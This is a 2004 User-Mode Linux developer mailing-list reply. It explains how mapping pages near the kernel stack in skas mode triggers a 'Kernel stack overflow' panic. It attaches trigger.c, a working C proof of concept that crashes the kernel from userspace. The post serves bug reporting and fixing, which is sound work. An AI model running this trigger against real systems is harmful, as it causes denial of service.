Re: [uml-devel] bad panic "Kernel stack overflow" - demo exploit

[azu <azu@sysgo.de>]

[-- Attachment #1: Type: text/plain, Size: 1582 bytes --]

BlaisorBlade wrote:
> Alle 13:39, lunedì 28 giugno 2004, azu ha scritto:
> 
>>Hi,
> 
> 
>>I triggered the following panic from userspace in skas mode
>>by mapping pages above 0xa0000000 ...
> 
> 
>>The check is useless in skas-mode (kernel faults get filtered
>>in segv() before handle_page_fault() is called),
>>so I added an ifdef for tt mode.
> 
> 
> This is a more sensible version of the patch (with runtime checking instead 
> that compile time), if I did not overlook anything: it must be an if(mode_tt). 
> I always compile in TT mode and normally don't use it (and sometimes UML does 
> not compile otherwise), and the patch must still work.
> 
> 
> However, I don't think this is the proper fix: please elaborate a bit more. 
> Segv() works the same way under TT and SKAS, and I think that more likely 
> there were an actual stack overflow (try to increase 
> CONFIG_KERNEL_STACK_ORDER and try to re-get the panic).
>

Paolo, your patch is the better one :-)

But it wasn't a stack overflow ...

Due to "overlapping" address spaces in skas mode,
it is possible to trigger the panic:
A userpage with the same address as current + 4096
must be valid in the vma, but not (yet) mapped to
the user:
0) addr = 0xa0000000
1) mmap a zero page to addr (valid vma) readwrite
2) fork -> mapping is now readonly
3) child writes to page
4) IF addr == current + 4096 THEN panic
5) addr += 4096
6) goto 1)

I wrote a small demo app to trigger the problem.
Limit your UML memory to 16MB or so to trigger the panic faster.



-Alex




[-- Attachment #2: trigger.c --]
[-- Type: text/x-csrc, Size: 961 bytes --]

/*
 * trigger.c - triggers panic("Kernel stack overflow") in UML
 *
 * 20040630, azu@sysgo.de
 */

#include <stdio.h>
#include <setjmp.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>

#define LOW  0xa0000000
#define HIGH 0xb0000000

int main(int argc, char **argv)
{
	unsigned long addr;
	int fd;

	fd = open("/dev/zero", O_RDWR);

	printf("This may take some time ... one more cup of coffee ...\n");

	for(addr = LOW; addr < HIGH; addr += 0x1000)
	{
		pid_t p;
		if(mmap((void*)addr, 0x1000, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0) == MAP_FAILED)
			printf("mmap failed\n");

		p = fork();
		if(p == -1)
			printf("fork failed\n");

		if(p == 0)
		{
			/* child context */
			int *p = (int *)addr;
			volatile int x;

			x = *p;
			return 0;
		}
		/* father context */
		waitpid(p, 0, 0);

		if(munmap((void*)addr, 0x1000) == -1)
			printf("munmap failed\n");
	}

	close(fd);
	printf("done\n");
}